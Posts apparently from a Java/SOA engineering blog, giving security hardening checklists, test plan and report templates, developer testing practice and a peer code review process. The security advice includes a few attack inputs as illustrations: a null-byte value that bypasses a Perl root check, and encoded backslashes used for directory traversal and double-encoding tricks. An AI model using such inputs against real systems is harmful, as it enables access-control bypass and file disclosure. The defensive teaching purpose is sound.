• Remove the guest account / anonymous login if it's not really needed. At least review the guest / public account and remove unnecessary privileges from this account.
• Review the ACLs (& authentication credential lists) regularly to detect forgotten change actions (changed roles, departed employees).


Confidentiality, Encryption, Signing

• Encrypt/hash sensitive data, e.g. bank accounts in the LDAP production copy used for development/test.
• Use message-level XML-Encryption to protect sensitive data in the intermediaries / external proxies / clouds. Point-to-point SSL doesn't prevent the intermediaries from reading the sensitive data. With WS-Encryption it's also possible to encrypt only a part of the messages, which is more flexible (e.g. in case the intermediary proxy needs to peek at the unencrypted part). Message-level security (e.g. WSS Authentication, XML-Encryption, XML-Signature) is independent of the transport protocol, thus it offers more flexibility to send SOAP messages across different protocols (e.g. http, jms, ftp).
• Use signature and saved logs for non-repudiation
• Use signature for message integrity
• Protect the key (e.g. don't backup the key and the encrypted data in the same backup-tape)
• Use well-proven encryption algorithms (e.g. AES) in well-proven libraries instead of inventing and implementing your own algorithm.
• Don't register sensitive services to UDDI
• Use robots.txt to keep sensitive files (e.g. WSDL, source code, configuration files, confidential documents) from appearing in Google.
• Don't store secrets in the client side (e.g. hidden form field, cookies, HTML5 storage). If you really need to store sensitive data in the client (or to pass them in the message): obfuscate the name and encrypt/hash the value. Beware of persistent cookies (the information will be written to the file system hence can be read by malicious users)
• Secure backup (e.g. with encryption), store it in a secure place.
• Avoid mixed SSL - nonSSL web sites (it causes user warning in the browser and can expose user ID.) Use CA-valid certificates (to avoid user warning in the browser).
• An example of a deployment pattern: use DMZ proxy servers between the outer and inner firewall to expose (enterprise) services to the public. The servers in the DMZ are treated as bastion hosts; special attention is given to protecting these servers against attacks.
• Load sensitive data on demand, clear them from memory as soon as you don't need them anymore. Don't keep/save them (e.g. in session variables or cache) if it's not really necessary.
• Use a sufficient key size. Securely distribute, manage and store the keys. Change the keys periodically.

Coding

• Limit accessibility: e.g. declare classes/methods/fields as private instead of public
• Declare sensitive classes/methods/fields as final so they can't be overridden
• Don't write secrets in the code (e.g. database connection string), beware that the secret strings in the compiled classes can still be read using reverse engineering tools
• Remove test code, example code, example database
• Using framework/library functions can be safer than building your own function (e.g. use jQuery .ajax to process the json response from ajax calls instead of plainly using eval). But make sure that the third-party libraries you use are safe (e.g. code review) and follow the security newsgroup for each library.
• Use jsp comment tags instead of html comments so that code comments are not visible to the client
• Use prepared statement for querying database to protect against sql injection (and better performance).
• If you need to redirect via url parameter consider using mapping value instead of the actual url link. Make sure that the redirect url is valid and authorized for the user.
• Beware of null insertion, e.g. circumventing  if ($user ne "root")  using user="root\0" in Perl. Solution: validate inputs.
• Beware of buffer overflow attacks (e.g. to overwrite variables / operation addresses, DoS attack). Solution: use a programming language/framework which is safer regarding buffer overflow (e.g. Java), bounds checking
• Beware of race condition exploitation for example to overwrite the username of another individual's session. Solution: avoid sharing variable between sessions via global variables / files / database /registry entry.
• Use CAPTCHA to distinguish genuine human inputs from robot inputs.

Configuration / operation management

• Protect / restrict access to configuration files & admin interfaces.
• Encrypt/hash sensitive configuration data (e.g. database connection, password).
• Centralized security management (e.g. OPSS for Oracle Fusion Middleware, JAAS for java applications) instead of managing different configurations spread across GUI, web services, database.
• To prevent DOS attack: restrict message size (e.g. default 10MB in Weblogic) and set server timeout. It's better to countermeasure DOS as early as possible (e.g. in the firewall/gateway with Cisco rate limit) before the load balancers & application servers.
• Run application-servers/database/ldap with minimum privilege, avoid running the server as root.
• Reduce the attack surface: disable unnecessary daemons, ports, users/groups, apache modules, network storage on the server. Disconnect network file servers if they're not necessary
• Update the OS/application-servers/database/LDAP/libraries with the latest (security) patches
• Remove the temporary files (e.g. hibernate.properties.old or httpd.conf.bak)
• Audit/scan regularly for new vulnerabilities. It's not enough to do penetration test only during the first acceptance-test since the attack surface can grow with time.
• Follow the security newsgroups/websites (e.g. BugTraq), discuss the potential new threats with your security manager.
• Monitor the system lively for early detection of anomalies (e.g. multiple malicious logins from a certain IP address, unusual frequent web/soap requests to a certain url). Use Intrusion Detection System (IDS).
• Change the default application ports. Close the unnecessary ports with firewall.
• Minimize the allowed IP address source by using firewall, Apache httpd file, Weblogic connection filter.
• Use separate environments for production, test, development and sandbox/playground (e.g. to test prototypes or try out new algorithms). Each component in these environments has different credentials than in the other environments. If the data in test & development are based on production data (to make the test more realistic), the sensitive production data should be masked.
• The (security) test configuration should be identical to production (e.g. firewall configurations, network topology, timeout settings); for example you can use VMware's LabManager to achieve this.
• Hide server information in the http header (e.g. ServerSignature Off in apache.conf).
• Turn off http trace feature (e.g. using Apache mod_rewrite), turn off debugging feature in production.
• Centralized security management (e.g. in the case of a Weblogic infrastructure: using OWSM with security policies) for better manageability and fewer mistakes.
• Use configuration change detection system (e.g.  monitor admin activities log files, Tripwire.)

Data

• Present the minimum data needed for any business request
• Don't blindly trust input data (from client GUI/cookies, database, web service requests), so always validate and sanitize the input
• Validate/preprocess (to prevent code/SQL/command injections, XSS, DoS) in this sequence:
    o canonicalization: transform different representations (e.g. %5c, which is "\" and can be used for a directory traversal attack) to a canonical form.
    o sanitation: encode/escape unwanted characters (e.g. &lt; for <).
    o data validation: validate based on white lists (e.g. an XSD that defines data type/format/range).
• To prevent DoS, XML bombs: limit the input size (e.g. web service request, file upload via GUI) using gateway/server configuration, XSD restriction length, limit the nesting depth, don't use maxOccurs="unbounded" in XSD. While we can also limit the message using application-server settings or XSD validation in the proxy, it's better to reject the messages as early as possible (e.g. in the gateway with an XML firewall) before the messages burden the load balancers and application servers.
• No security decision based on url params (which can be manipulated by clients).
• Validate & sanitize output (e.g. web, database) to prevent XSS, code injections.
• Use output encoding for special characters (to prevent XSS, code injections).
• Beware of double-encoding attacks (e.g. \ encoded as %5c, double-encoded as %255c).
• Do not store sensitive data in cookies.
• How do you validate input data (from user input, database, external systems)? How do you handle validation-error situations?
• Avoid sensitive data in the code/scripts, config files, log files. Restrict access to these files (least-privilege principle).
• Encrypt sensitive data (e.g. employees' bank account published by LdapService).
• How do you prevent data fishing (e.g. limit output)?
• Use XML-firewall: faster (dedicated hardware), delegate the burden of SOA/OSB servers for validation.  Reject the messages earlier for better containment and preserving performance: threat should be addressed at the edge of the network instead of at the application layer.
• Reject SOAP message with <!ENTITY> tag (or whole DTD tag) or  use SOAP 1.2 to protect against entity attacks.
• Reject SOAP message with CDATA to avoid CDATA injection.
• Attachment/file uploads:
    o limit the size
    o the files must never be executed/evaluated
    o anti virus check

Error handling

• Prevent sensitive information (e.g. server fingerprinting for hackers) in the error messages. Return a generalized error message (to hide the implementation technology) instead of just passing the original error string from the framework (e.g. a Java stacktrace).
• Don't put personal information (e.g. a developer's name) in the error message, to avoid social engineering exploits.
• Test and understand the behavior of your system in case of failure / error.
• Catch all possible errors / failures  and handle gracefully to avoid DoS.
• The appropriate privilege level is restored in case of error / failure, e.g. invalidate the session
• Security mechanisms keep working in case of errors / exceptions / DoS attacks
• Release resources (e.g. file, database pool) in case of error to prevent DoS.
• Centralized error handling.

Logging

• Log and monitor sensitive operations (e.g. create user, transfer money).
• Protect log files / other files (e.g. history) which can be useful for forensic investigation using ACLs; use signatures if necessary.
• No sensitive information (e.g. passwords) in the log; check the regulations (e.g. SOX in the US, WBP in the Netherlands).
• Information in the log: userID, action/event, date/time (normalized to one time zone), IP address.
• Throttle the log to prevent DoS or evidence removal via log file rotation.
• Centralize logging and standardize the logging information.
• Audit the logs regularly to detect malicious attempts, using an automatic alert system. What information is needed to observe signs of malicious activity? e.g. the number of connections per requester IP address.
• Validate and sanitize if you log the input (GUI form input, web service request,  or external database).
• In case of an attack, what trail of forensic evidence is needed (e.g. the IP addresses of the attack messages)?
• Know your baseline (typical log file growth in normal operation), plan log backup/removal and log rotation accordingly.


Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com


References:


• Hacking Exposed Web Applications by Scambray et al.
• How to break web software by Andrews & Whittaker
• OWASP Code Review Guide
• Improving Web Services Security (Microsoft patterns & practices) by Meier et al.
• XSD restrictions http://www.w3schools.com/schema/schema_facets.asp
• ISO 27001, ISO 27002

Monday, September 10, 2012

Test Checklists



Notes:
• This is a continuation from the blog about Development Test http://soa-java.blogspot.nl/2012/09/development-test.html
• For these checklist items I sometimes use questions instead of mandatory compliance checks (e.g. "how to set up test data" instead of "checklist: test data should always come via the database"). The goal of the checklist is to prompt our minds to be aware of certain issues, not to force a specific/narrow solution. The "best" choice depends on the project context (e.g. test goal, security environment, etc.).
• The symbol "»" at the beginning of a line means that the item is relatively important.

Test Plan template

• Date, version, test objectives & scopes (e.g. functional requirements acceptance test, security penetration system test, performance unit test)
• Process definitions (can be defined at the dev-team level, so they don't have to be written in each test plan): metrics (e.g. #bugs & severity), defect classification, exit criteria, defect management, defect reporting (e.g. Trac), deliverables (e.g. test case library), whether review or approval is needed for this test plan (e.g. test manager, clients).
• Assumptions (e.g. firewall and server configurations mimic the production environment)
• Preconditions for the whole test suite, e.g. licenses for software, the production database is cloned into the LabManager/virtual machine test environment
• » For each test cases:
     o Test case name and short description
     o Traceability  with requirement/usecase docs (i.e. the requirement ID)
     o Preconditions for this test case (e.g. certain data states in the database, certain inputs from mock web services)
     o Test steps and inter-dependencies with other test cases: e.g. fill-in employees' salaries steps: ....., dependency:  add new employees (test case#1)
     o Input data e.g. birth date 31-2-1980 (which is an invalid date)
     o Expected results
     o Part of system (e.g. GUI/presentation tier)
     o Area (e.g. security, functional, performance)
     o Test method (e.g. manual, unit test)
     o Priority / risk / test effort / test coverage (e.g. high, low)
• » Resources:
     o roles, who will build/execute the tests and how many man-hours needed (including external resources & trainings needed due to skills-gap)
     o server/database/software/tools/hardware needed
• Schedule/plan

Test Report template

• » Test date, version, tester name, artifact (which jar, svn revision), test environment (which server/LabManager), test code version (svn rev)
• » Test objectives & scopes  (e.g. functional requirements acceptance test, security penetration system test, performance unit test
• »  For each test result:
     • Test result ID number
     • Traceability (test case ID number in the test plan, requirement ID number in the requirement docs)
     • Expected result e.g. web service response time below 2 seconds (average) and 5 seconds (max).
     • Actual result and impact, e.g. result: the web service response time is 90 seconds, impact: the user waiting time in the GUI is 2 minutes (unacceptable according to the SLA)
     • Status:
          • Ok/green: tested ok
          • Bug/red(high priority)/yellow(low priority): defects, a ticket has to be made in bugzilla/trac (with priority level & targeted version/milestone)
          • No-bug/gray: won't fix, false-positive
          • Hasn't been tested/white
     • Follow-up actions (e.g. reworks by developers)

     • Part of system (e.g. GUI/presentation tier)
     • Area (e.g. security, functional, performance)
     • Priority / risk  (e.g. high, low)
 • Root-cause analysis and recommendations, e.g. excessive bugs in authentication classes; root cause: inadequate knowledge; recommendation: training, code review.
• Resources (roles, planned & actual man-hours)
• List non-testable requirements e.g. the GUI should be beautiful.

Weekly Status report

Please see http://soa-java.blogspot.nl/2012/09/weekly-status-report-template.html

Test data

• » How to setup test input data (e.g. via database copy or DDL-DML database scripts) each time we setup a new Labmanager/test environment.
• » Make test cases for: too little data (e.g. empty input, null), too much data, invalid data (wrong format, out of range), boundary cases
• » Make sure the positive cases have correct data (e.g. validated according to xml schema, LDAP attributes & tree structures are correct)
• » How to mask sensitive test data (e.g. password, bank account)
• » How realistic the data are?
• How to collect / create test input data (e.g. sampling the actual traffic from jms topic or populate fake customers data using pl/sql).
• How to recover/reinitialize the data after the test (to fulfil the precondition for the next test)
• How to maintain / version the test data (i.e. test data for the current version and for the next software version)
• How to collect and save the test result data if needed (for further test or analysis)

Functional & Design

• » Test that the product correctly implements (every) requirements and use-cases (including alternative use-cases)
• » The product works according to the design and its assumptions (e.g. deployment environment, security environment, performance loads)
• » Test the conformance to relevant standards: the company standard/guideline as well as common standard such as Sarbanes-Oxley (US) / WBP (Netherlands)
• Test that (every) functions give correct result ( including rounding-error for numerical functions)
• Test (every) application logic (e.g. flow control, business rules)

Performance test

• » Find out the typical data traffic (size, frequency, format) & number of users/connections in the production
• » Response time (UI, webservice) / throughput (web service, database) meet the requirements/SLA.
• » Load test: at what load does the performance degrade or fail (see the sketch after this list)
• » Stress test: run the system for a long time under realistic high loads while monitoring resource utilization (CPU/memory/storage/network), e.g. to check for memory leaks and unclosed connections, and to tune timeouts and thread pools.
• In case of unacceptable performance: profiling the system parts that affect the performance (e.g. database, queue/messaging, file storage, networks).
• Scale out (capacity planning for future) e.g. 3x today peak usage
• Test the time-to-complete of offline operations (e.g. OLAP/ETL bulk jobs scheduled every night). Is the processing time scalable? What do you do if the bulk operation hasn't finished by 8.00 / working hours?
• Rerun the performance test periodically in case of changes in usage patterns (e.g. a growing number of users), changed configurations, or the addition of new modules/services. So we can plan the capacity ahead and prevent problems before they happen.
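A minimal load-test sketch (Java 11+ HttpClient) that fires concurrent requests and reports the average and worst response time; the endpoint URL and the user/request counts are hypothetical, and dedicated tools (SOAPUI, JMeter) do this far more thoroughly:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;

public class MiniLoadTest {

    public static void main(String[] args) throws Exception {
        int users = 50, requestsPerUser = 20;
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest request = HttpRequest.newBuilder(
                URI.create("http://testserver:7001/employeeService/ping")).GET().build();
        ExecutorService pool = Executors.newFixedThreadPool(users);
        ConcurrentLinkedQueue<Long> timingsMs = new ConcurrentLinkedQueue<>();
        for (int i = 0; i < users; i++) {
            pool.submit(() -> {
                for (int j = 0; j < requestsPerUser; j++) {
                    long start = System.nanoTime();
                    try {
                        client.send(request, HttpResponse.BodyHandlers.discarding());
                    } catch (Exception e) {
                        // a real test would count failures separately
                    }
                    timingsMs.add((System.nanoTime() - start) / 1_000_000);
                }
            });
        }
        pool.shutdown();
        pool.awaitTermination(10, TimeUnit.MINUTES);
        System.out.printf("avg = %.1f ms, worst = %d ms%n",
                timingsMs.stream().mapToLong(Long::longValue).average().orElse(0),
                timingsMs.stream().mapToLong(Long::longValue).max().orElse(0));
    }
}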

Reliability test

• Test (every) fault possibilities, test behaviour & error messages when an exception/failure occurs (e.g. simulate network failure or url-endpoint connection error in the configuration plan)
• Test that faults don't compromise the data integrity (e.g. compensation, rollback the transaction) and security. Data loss should be prevented whenever possible.
• Test failover mechanism, check the data integrity after failover.


Environment/compatibility test:

• » Tests for different browser (for UI projects), application servers (e.g. vendor, version), database (e.g. vendor, version), hardware (memory, cpu, networks), OS (& version)
• » Tests for different encoding (e.g. UTF-8 中文), different time-zone, different locales (currencies, language, format) e.g. 2,30 euro vs $ 2.30, test conversion between different components (e.g. database and LDAP servers can have different date format).
• » Test file system permissions using different process owner (e.g. generate files with oracle-user & consume the files with weblogic-user during applications integration)
• » Test if the configuration files (e.g. deployment plan, web.xml, log4j-config.xml) work
• Integration test: the connections between components (e.g. the endpoints in the configuration plan)
• Install & uninstall, deployment documentation

GUI

• » All GUI messages (including error messages) are clear/understandable by end users and match with user terminologies
• » How frequent are the errors? how the system reacts to user error (e.g. invalid input, invalid workflow)? how the users recover from errors?
• All navigations/menu/links are correct
• Check whether all GUI components (menu/commands/buttons) described in the user instructions are exists
• The fonts are readable
• The GUI is consistent with the user environment (e.g. the web style in your organization)
• The software state is visible to the users (e.g. waiting for the backend response, error state, waiting for user input/action)
• Validate the (X)HTML, CSS: doctype, syntax/structure valid
• Another GUI testing checklists: http://www.sitepoint.com/ultimate-testing-checklist/

Tips for organizing usability test

• Identify the test subjects
• Provide a simple test guideline & result questionnaire, beware that your test subjects may be not so technical
• Is the software intuitive, easy to use, how much training is needed when you roll out this product in the production?
• Is online help or reference to user documentation available? User documentations should be complete enough and easy to understand for the intended audience
• Attend at least one test as test participant

Coding

• Test that variables are correctly initialized
• Test multi-threading scenarios (race condition, deadlock)

Tools selection

• do any team members already have experience with this tool
• how easy to use
• customer review, popularity, how active the discussion groups/blogs to learn
• maturity
• support
• how active the development
• memory, processor requirement
• price/open-source
• easy to install/configure
• functionality, does this tool meet the requirement of the company tests
• demo/try before buy

Security

• Authentication: login, logout, guest, password strength
• Authorisation: permissions, admin functions,
• Data overflow, huge input attack/DOS
• For more complete security checklists see http://soa-java.blogspot.nl/2012/09/security-checklists.html


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




References:

• Software Testing and Continuous Quality Improvement by Lewis
• Code complete by McConnell
• Department Of Health And Human Services, Enterprise Performance Life Cycle Framework, Checklist.

Development Test

Since I am involved in the design/code/test review team at my work, I want to share some knowledge with you in this blog.


Scope

This document discusses the development test (test the code by developers before sending the artifacts to the QA/test team).


Benefits of developer testing

• Reduce bug fix costs by detecting the defects earlier before the code is delivered to QA/Test team.
• Early and frequent development tests give early feedbacks to the developer team.
• The statistics and the trend charts can be useful for the management team to assess the maturity/reliability of the product and whether early actions are necessary to correct the process. For example, it would be too late to discover that you need to hire a security expert after you have already sent the product with security bugs in it to the external party. The QA manager can use the test statistics to decide whether or not to accept the product from the development team.


Define the process

• Determine how the developers do the tests within the software process, e.g.
   o build the tests before the developers start coding (TDD/agile, see the JUnit sketch after this list),
   o run the tests when the code is mature enough, before delivery to the test team (waterfall)
   o perform an automatic continuous integration test after every SCM commit (Agile)
   o perform exploratory tests (Agile)
   o scrum demo / user test for user feedback at the end of each Sprint (Agile)
   o spiral/incremental test: run the tests iteratively, adding new tests for the integration of new SOA components (while keeping the previous tests running as regression tests) at each Scrum sprint
• Do you need a test plan / documented test cases?
• Does the test plan need to be reviewed (e.g. for completeness)?
• Define how the tests will be conducted, e.g. automatic tests (unit tests, Selenium GUI tests), manual user tests, manual exploratory tests
• Determine entry criteria (e.g. code is mature enough)
• Determine exit criteria (e.g. approval by developer manager, approval by QA manager that the code is mature enough to be delivered to the QA/test team)
• Determine metrics (e.g. error list with severity & type)
• Are tools available to assist test process (e.g. SOAPUI test, yslow)?
• Determine the defect reporting/communication channel: how to report test results (e.g. Trac, Bugzilla), how to archive test cases & results (e.g. svn, wiki), defect management (e.g. how to track the test status, rework and retesting)
• Determine who will play the tester role. You may have several testers assigned to specific areas (e.g. a security specialist for penetration testing, or invited customers for use-case testing).
• Determine the time needed to develop and perform tests. Discuss the time/plan with project manager / team lead to obtain management support. Schedule the meetings. Set time-limits.
• Do the tests, register the anomalies.
• Discuss whether or not a fix is needed.
• Discuss the fix, decide in which version the fix should be done and who will do the rework, estimate/plan the rework
• Determine the exit decision e.g. re-inspection after required reworks, minor reworks with no further verification needed.
• Schedule the follow-up / re-inspection of the rework.
• Collect "lessons to learn" to improve the development process.
• Do you need permission, or do you need to inform other departments? (e.g. you'd better seek permission from the infrastructure manager before bombing the servers with a DoS penetration test or performance stress testing). The same applies to red-team testers (who perform penetration tests without prior knowledge of the system and without the IT staff's awareness): always seek permission from management first.
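
To illustrate the "build the tests before coding" item above, a minimal TDD sketch in JUnit (DiscountCalculator and its pricing rule are hypothetical): the test is written first and fails, then the developer writes just enough code to make it pass; the same test later runs automatically in every continuous-integration build.

import static org.junit.Assert.assertEquals;
import org.junit.Test;

// Written *before* DiscountCalculator exists: it pins down the expected behaviour (TDD).
public class DiscountCalculatorTest {

    @Test
    public void ordersOfHundredEurosOrMoreGetTenPercentDiscount() {
        DiscountCalculator calculator = new DiscountCalculator(); // hypothetical class under test
        assertEquals(90.0, calculator.priceAfterDiscount(100.0), 0.001);
    }

    @Test
    public void smallOrdersGetNoDiscount() {
        DiscountCalculator calculator = new DiscountCalculator();
        assertEquals(50.0, calculator.priceAfterDiscount(50.0), 0.001);
    }
}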


Best practices

• The test is performed by someone other than the developer who implemented the code: this avoids blind spots, keeps the testing objective and encourages good documentation.
• Determine how to share the test code with other developers & the QA team (for code reuse and reproducible results). Reuse tests with test libraries / a knowledge repository (e.g. a test case library). Use version control (e.g. svn)
• Regression test: rerun the past tests to detect whether the current fix has introduced new bugs
• Automatic tests are better than manual tests: repeatable, less error-prone, more efficient to run and reuse, and they can be run frequently (e.g. continuous integration)
• Discuss realistic scenarios with your client / user when defining the test data
• Find out the typical use (e.g. the average message size, how many requests per minute) by asking the users
• Find out the typical failures in production (e.g. network outage) by asking the production team
• Find out the typical environment/configuration in production (e.g. browser, OS). Do you need to consider old environments/data for backward compatibility (e.g. IE 5.0)?
• Build a test case for every requirement / use case item. Mention the requirement number in the test case document for traceability.
• Determine which tests to perform within the limited time, e.g. installation/configuration/uninstall tests, user functional tests, performance tests, security tests, compatibility tests.
• Don't try to cover everything. Prioritize the test cases based on the most likely errors (e.g. which functional area, which class) and the risk.
• Avoid overlapping test cases
• Use test cases with convenient values that are easy to verify by hand (e.g. 10000 instead of 47921)
• Make sure that the testers have business knowledge about the domain (e.g. terminologies, business logics, workflow, typical inputs)
• Consider an automatic test case generator
• Review and test the test code
• GUI prototyping/pilot test: involve only a limited number of testers & use easier scenarios
• Consider positive (e.g. good data) as well as negative (e.g. wrong data, database connection failure) test cases; see the sketch after this list
• Use test framework/tools (avoid reinventing the wheel) e.g. SOAPUI, Selenium, JMeter.
• Keep, interpret and report the test statistics. Useful charts:
   o defect gap analysis: found bugs and solved bugs vs time
   o number of bugs per function/module/area (bugs tend to be concentrated in certain modules)
   o number of bugs per severity level (e.g. critical, major, minor)
   o number of bugs per status (e.g. ok, solved, unsolved, not yet tested)
   o test burn-down graph: number of unsolved bugs and test cases not yet run vs time
   o number of bugs per root cause (e.g. incomplete requirement, database data/structure, etc.)
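
For the positive/negative item above, a small JUnit sketch (the IbanValidator class is hypothetical) that covers good data as well as several kinds of bad data in one place:

import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import org.junit.Test;

public class IbanValidatorTest {

    private final IbanValidator validator = new IbanValidator(); // hypothetical class under test

    @Test
    public void acceptsWellFormedIban() {             // positive case
        assertTrue(validator.isValid("NL91ABNA0417164300"));
    }

    @Test
    public void rejectsNullEmptyAndMalformedInput() { // negative cases
        assertFalse(validator.isValid(null));
        assertFalse(validator.isValid(""));
        assertFalse(validator.isValid("NL91-THIS-IS-NOT-AN-IBAN"));
    }
}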


Test checklists

Please see http://soa-java.blogspot.nl/2012/09/test-checklists.html


The test pyramid

• Level 1: automatic unit tests
• Level 2: service integration tests (e.g. the connection between services); see the sketch after this list for a level 1 vs level 2 example
• Level 3: user acceptance / system tests (e.g. GUI, security, performance)
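
To make the difference between level 1 and level 2 concrete, a rough sketch (OrderService, OrderRepository and the test endpoint URL are hypothetical; the unit test uses Mockito to mock the repository): the level 1 test isolates the class with a mock and runs fast, while the level 2 test talks to a real test endpoint.

import static org.junit.Assert.assertEquals;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
import java.net.HttpURLConnection;
import java.net.URL;
import org.junit.Test;

public class OrderServiceTests {

    // Level 1: pure unit test, the repository dependency is mocked (fast, no network/database).
    @Test
    public void unitTest_totalIsSumOfOrderLines() {
        OrderRepository repository = mock(OrderRepository.class);   // hypothetical interface
        when(repository.findLineAmounts("order-42")).thenReturn(new double[] {10.0, 15.0});

        OrderService service = new OrderService(repository);        // hypothetical class under test
        assertEquals(25.0, service.total("order-42"), 0.001);
    }

    // Level 2: integration test, talks to the real (test) endpoint over HTTP.
    @Test
    public void integrationTest_orderEndpointIsReachable() throws Exception {
        URL url = new URL("http://test-server.example.org/orders/order-42"); // hypothetical test endpoint
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        assertEquals(200, conn.getResponseCode());
    }
}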


Tools

• Unit tests: junit, nunit
• Service functional tests e.g. SOAPUI
• Performance tests e.g. SOAPUI, JMeter, yslow (GUI)
• Security tests e.g. SOAPUI, paros, spike, wireshark
• GUI tests e.g. Selenium, httpunit




Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com


References:

• Software Testing and Continuous Quality Improvement by Lewis
• Code Complete by McConnell


Thursday, April 26, 2012

Software Review


Since I am involved in the software review & guideline team at my work, I've spent some time studying the review process, which I want to share with you in this blog.

The benefits of software review:
• Increase software quality, reduce bugs.
• Opportunities to learn (for both the code authors and the reviewers), and a means of knowledge transfer to junior developers.
• To foster communication between developers.
• Various studies show that the review process saves costs (e.g. $21 million reported by HP). It's cheaper to fix bugs in the earlier phases (design, development) than in the later phases (QA/test phase, shipped products).
• As a part of best practices/standard e.g. PSP, CMMI3.
• Motivate the developers to improve their code quality in order to avoid "bad scores" during review. This ego effect still works even when the random review covers only 30% of the total code.

The disadvantages of review:
• Costs time. Solution: limit the time (e.g. max 1-2 hours).
• Developers have to wait for the reviewers, which might create delays in the pipeline. Solution: the project manager has to include the software review process in the plan, including the time & resources (the reviewers for the review, the developers for the rework).
• The code author feels hurt when someone else points out their mistakes. Solutions: be sensitive/friendly when discussing the findings, make sure both the reviewers & authors agree on the positive benefits, have the reviewers also give positive feedback to the authors, and focus on the code, not the author.
• The developers think that they have better things to do. Solution: support from the management (e.g. enforce the review process formally).





An example of a review process, consisting of 3 steps:
1. "Over the shoulder" short session (30min)
The author guides the reviewer through the code: the entry point, the most important classes and the relationships between them. He also explains the flow, the sequence & concurrency mechanisms and the patterns/algorithms used. This session is similar to a pair programming session. However, we need to be aware of the disadvantages of this method:
• the author has too much control over the scope & pace of the review.
• The reviewer has barely any time to check properly.
• The reviewer tends to condone the mistakes after hearing the author's explanations.
That's why we need to keep this session short and follow it with a private review session.

2. Private-review (30-90min)
Without the author's involvement, the reviewers check out the code from SCM (e.g. svn), check some documentation (use case, specs, design), do a quick sanity check, perform some tests/validation (e.g. SOAPUI), check against checklists & specifications, and read parts of the code.

3. Post-review activities:
• The reviewer discusses the findings with the author (30 min)
• consult with the product owner, architect, team lead and project manager regarding the risks, bug priorities & the rework impact on the plan
• create bug tickets in Trac/Bugzilla
• make an appointment for the follow-up





Some best practices:

Determine the scope / the part of the project to review, based on risk analysis and the author's error log. For example: based on his personal log, Bob (the author) knew that he often made mistakes with web security, so he advised Alice (the reviewer) to concentrate on the security issues of his web code.

To improve the process, you need to define metrics in order to measure the effect of the changes. These metrics can be external (e.g. #bugs reported by the QA team, #customer tickets) or internal (e.g. #bugs found, time spent, loc, defect density, complexity measures). Based on the #bugs found by 2 reviewers, you can estimate the total number of bugs and the review yield (see the example below).
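
One standard way to make such an estimate is the capture-recapture calculation (this worked example is mine, not from the original post): if reviewer A finds A defects, reviewer B finds B defects, and C of these are found by both, the estimated total is roughly A*B/C, and the yield is the number of unique defects found divided by that estimate. A tiny sketch:

public class ReviewYieldEstimate {

    public static void main(String[] args) {
        int foundByA = 20;    // defects found by reviewer A
        int foundByB = 15;    // defects found by reviewer B
        int foundByBoth = 10; // defects found by both reviewers

        // Capture-recapture (Lincoln-Petersen) estimate of the total defect count.
        double estimatedTotal = (double) foundByA * foundByB / foundByBoth; // = 30
        int uniqueFound = foundByA + foundByB - foundByBoth;                // = 25

        System.out.printf("Estimated total defects: %.0f%n", estimatedTotal);
        System.out.printf("Review yield so far: %.0f%%%n", 100.0 * uniqueFound / estimatedTotal); // ~83%
    }
}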

A checklist is the most efficient tool for a reviewer. The checklist should be short (less than one A4 page) and describe the reasons, the risk level (based on damage/impact, popularity, simplicity to perform) and references for further information.

Perform self-review using personal checklists (since everybody has a unique tendency for certain mistakes).

Take advantage of automatic tests (e.g. checkstyle, findbugs, pmd in Java). Some companies include these tests in their continuous integration build, and the metrics can then be shown in a graph to highlight the quality trend (e.g. bug reduction vs sprint cycles).

A review meeting is not the most effective way to review; it costs more man-hours. It's better for the reviewer to read the code alone and concentrate.

Maintain the reviewer's concentration by limiting the time for each review (max 1.5 hours, max 400 loc (lines of code) per review). Slow down to read the code carefully (below 500 loc per hour).

Have the code authors annotate the code appropriately (e.g. the patterns/algorithms used: visitor pattern, quick sort, etc.).

The code author provides notes for his/her project: the starting point/files to begin with, important classes, dependency/class diagrams, patterns used, where to find the documentation (use case, specs, design doc, installation guide), test cases (e.g. web service request-response examples). This information is useful not only for the reviewers but also in case the author leaves the company (e.g. a temporary external consultant). You can use Trac/a wiki as a collection point for this information.

Verify/follow up whether the bugs are really fixed.

Beware of comparing apples with oranges: the #bugs found in a code base depends not only on the developer's expertise but also on:
• how complex the problem is
• how many reviewers, the time spent, their expertise
• specification & code maturity (development version, beta version, shipped product)
• programming languages
• tools (IDE, validator, etc)

Review-team lead / process owner responsibilities:
• maintain the expert knowledge of the reviewers, arrange training if necessary
• establish and enforce review policies
• lead the writing and implementation of the review process and action plans
• define the metrics, make sure that they're collected and used
• monitor the review practices and evaluate their effectiveness

Process assets:
• process description
• guidelines & checklists
• issues tracking system e.g. trac/bugzilla

Where to do the review in a typical software process:



To be continued: http://soa-java.blogspot.nl/2012/09/the-review-process.html


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




Literatures:

11 Best Practices for Peer Code Review
http://support.smartbear.com/resources/cc/11_Best_Practices_for_Peer_Code_Review.pdf

Best Kept Secrets of Peer Code Review by Jason Cohen
Plus: recent, supported by scientific analysis of the literature & field studies, down-to-earth advice (instead of management jargon high in the clouds). Minus: repetitive advertisements for their review tools.


Peer Reviews in Software: A Practical Guide
by Karl Wiegers (Paperback)



Seven Truths About Peer Reviews by Karl E. Wiegers
http://www.processimpact.com/articles/seven_truths.html

OWASP code review guide
https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf